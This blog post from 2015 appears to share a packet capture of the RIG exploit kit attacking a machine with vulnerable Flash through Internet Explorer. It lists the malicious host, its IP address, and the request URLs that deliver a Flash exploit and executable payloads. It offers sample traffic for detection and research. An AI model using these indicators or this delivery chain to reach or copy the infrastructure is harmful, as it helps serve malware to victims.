RIG EK Web Exploit Kit Exploiting Vulnerable FLASH x-flash-version: 11,8,800,94 Traffic Sample

By | June 22, 2015

2015-02-06 12:17:55.655135 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [P.], seq 1:609, ack 1, win 64240, length 608
E….3@…^…………P.. .|.}3P…….GET /?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|MzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: booster.daily-mood-booster[.]com
Connection: Keep-Alive
2015-02-06 12:17:55.655185 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [.], ack 609, win 64240, length 0
E..(._……………P..|.}3…)P….W……..
2015-02-06 12:17:57.261526 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [P.], seq 1:1356, ack 609, win 64240, length 1355
E..s.`……………P..|.}3…)P…t…HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:17:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding
Content-Encoding: gzip
2015-02-06 12:18:00.209943 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [P.], seq 609:1031, ack 71884, win 64240, length 422
E….M@…_=………..P…)|…P…~…GET /index.php?req=mp3&num=81&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CMzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: booster.daily-mood-booster[.]com
Connection: Keep-Alive
2015-02-06 12:18:00.209988 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [.], ack 1031, win 64240, length 0
E..(……………..P..|…….P…~………
2015-02-06 12:18:02.824202 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [P.], seq 71884:73239, ack 1031, win 64240, length 1355
E..s…….L………P..|…….P…y]..HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:17:57 GMT
Content-Type: application/x-msdownload
Content-Length: 294912
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Accept-Ranges: bytes
2015-02-06 12:18:06.690502 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [P.], seq 1031:1654, ack 367019, win 64240, length 623
E…..@…^…………P….|…P….#..GET /index.php?req=swf&num=754&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|MzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://booster.daily-mood-booster[.]com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|MzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: booster.daily-mood-booster[.]com
Connection: Keep-Alive
2015-02-06 12:18:06.690520 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [.], ack 1654, win 64240, length 0
E..(.s……………P..|……>P………….
2015-02-06 12:18:07.239588 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [P.], seq 367019:368374, ack 1654, win 64240, length 1355
E..s.t…..q………P..|……>P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:18:01 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 20239
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
2015-02-06 12:18:08.730450 IP 192.168.138.158.49167 > 46.182.30.163.80: Flags [P.], seq 1:296, ack 1, win 64240, length 295
E..O..@…_S………..P…..E#CP….w..GET /index.php?req=mp3&num=1607&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|MzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU&dop=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: booster.daily-mood-booster[.]com
2015-02-06 12:18:08.730495 IP 46.182.30.163.80 > 192.168.138.158.49167: Flags [.], ack 296, win 64240, length 0
E..(……………..P…E#C….P…&………
2015-02-06 12:18:09.371527 IP 46.182.30.163.80 > 192.168.138.158.49167: Flags [P.], seq 1:205, ack 296, win 64240, length 204
E………………..P…E#C….P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:18:04 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding
2015-02-06 12:18:09.431866 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [.], ack 387463, win 64240, length 0
E..(..@…`y………..P…>|.f.P………….
2015-02-06 12:18:09.466280 IP 46.182.30.163.80 > 192.168.138.158.49167: Flags [P.], seq 1:205, ack 296, win 64240, length 204
E………………..P…E#C….P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:18:04 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding
2015-02-06 12:18:09.466473 IP 192.168.138.158.49167 > 46.182.30.163.80: Flags [.], ack 205, win 64036, length 0
E..(..@…`x………..P…..E$.P..$&………
2015-02-06 12:18:17.790248 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [P.], seq 1654:2086, ack 387463, win 64240, length 432
E…..@…^…………P…>|.f.P….z..GET /index.php?req=mp3&num=91593&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CMzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU&dop=04 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: booster.daily-mood-booster[.]com
Connection: Keep-Alive
2015-02-06 12:18:17.790262 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [.], ack 2086, win 64240, length 0
E..(……………..P..|.f…..P………….
2015-02-06 12:18:21.033468 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [P.], seq 387463:388818, ack 2086, win 64240, length 1355
E..s…….[………P..|.f…..P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:18:16 GMT
Content-Type: application/x-msdownload
Content-Length: 294912
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Accept-Ranges: bytes

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *